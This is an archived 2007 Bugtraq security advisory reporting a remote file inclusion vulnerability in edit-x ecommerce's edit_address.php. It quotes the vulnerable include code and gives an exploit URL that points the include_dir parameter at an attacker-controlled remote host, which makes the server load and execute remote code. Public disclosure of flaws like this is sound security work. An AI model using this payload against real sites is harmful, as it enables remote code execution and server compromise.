edit-x ecommerce (include_dir) Remote File include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: edit-x ecommerce (include_dir) Remote File include
From: emel_gw_ini@xxxxxxxxx
Date: 9 Jan 2007 21:36:33 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: edit x
# Vendor : http://www.edit-x.com
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew

[[inject]]]---------------------------------------------------------

on file editx/edit_address.php

$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
require_once("../ups/upsavs.php");

exploit :

http://target.lu/[editx 
PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu?

[[End]]-----------------------------------------------------------

Prev by Date: iDefense Security Advisory 01.09.07: Multiple Vendor X Server DBE Extension ProcDbeSwapBuffers Memory Corruption Vulnerability
Next by Date: iDefense Security Advisory 01.09.07: Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability
Previous by thread: iDefense Security Advisory 01.09.07: Multiple Vendor X Server DBE Extension ProcDbeSwapBuffers Memory Corruption Vulnerability
Next by thread: iDefense Security Advisory 01.09.07: Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability
Index(es):
- Date
- Thread